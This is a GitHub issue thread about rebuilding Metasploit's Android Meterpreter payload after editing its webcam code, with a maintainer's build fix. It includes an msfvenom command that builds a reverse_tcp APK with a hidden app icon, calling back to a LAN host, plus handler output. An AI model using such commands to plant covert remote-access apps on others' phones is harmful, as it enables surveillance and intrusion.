### ISSUE TITLE
Meterpreter is not using my Payload on Android

### ISSUE THREAD

**Issue by KlausMueller1996** [rapid7/metasploit-payloads#536]
I've been playing around with the webcam_start_android.java class but can not get my changes to run on my mobile phone.
I've checked out metasploit-framework and metasploit-payloads paralle to each other.

After doing my changes I run:

	mvn package -P deploy -Dandroid.release=true    
 
The build completes successfull and copies the new meterpreter.jar and new ext_server_stdapi.jar to the metasploit-framework directories:

	./metasploit-framework/data/meterpreter/meterpreter.jar
	./metasploit-framework/data/meterpreter/ext_server_stdapi.jar

After that I create the APK as follows:

./msfvenom -p android/meterpreter/reverse_tcp AndroidMeterpreterDebug=true JavaMeterpreterDebug=true AndroidHideAppIcon=true AndroidWakeLock=true LHOST=192.168.178.33 LPORT=4444 -f raw -o TCPSHELL_INTERN_4444.apk TCPSHELL_INTERN_4444.apk

After copying the apk to my phone I can start it.

When running the msfconsole it connect to the app and I get a meterpreter session. However when I call webcam_snap the old code ist still executed. Locking at logcat I see the exception raised in webcam_start_android line 34 which refers to the original code line that has been removed with my changes

02-15 13:51:07.404 13239 13273 W CameraBase: An error occurred while connecting to camera 1: Status(-8, EX_SERVICE_SPECIFIC): '6: validateClientPermissionsLocked:1499: Caller "com.metasploit.stage" (PID 10431, UID 13239) cannot open camera "1" from background (calling UID 10431 proc state -1)'
02-15 13:51:07.406 13239 13273 W System.err:    at com.metasploit.meterpreter.android.webcam_start_android.execute(webcam_start_android.java:34)

line 34 in the original file:
             camera = (Camera) cameraOpenMethod.invoke(null, camId - 1);

line 34 in my changed code:
            Log.e("MainActivity", "failed to open Camera");

Why is the original java class still used and not my changed class?
What am I missing?
Thanks for your help.

**Comment by timwr** [comment]
I think the issue here is you're not supplying an argument for the android.sdk.path, e.g:
`mvn package -Dandroid.sdk.path=/path/to/android-sdk -Dandroid.release=true -P deploy`
This means only the java meterpreter is built.
Instead of the above command you can normally just run `make android` in the same directory.
You'll need to install the android sdk, and ensure it has the correct platforms:
```
sdkmanager --licenses
sdkmanager "platforms;android-3"
sdkmanager "platforms;android-10"
sdkmanager "platforms;android-19"
```
After that you should see files in `./metasploit-framework/data/android` and the following when you catch session:
```
[*] Started reverse TCP handler on 127.0.0.1:4444
WARNING: Local file /metasploit-framework/data/android/metstage.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /metasploit-framework/data/android/meterpreter.jar is being used
```

fyi: You won't need to restart the handler each time you rebuild

**Comment by KlausMueller1996** [comment]
Thanks, this did the trick (in combination with using  oracle jdk1.8)
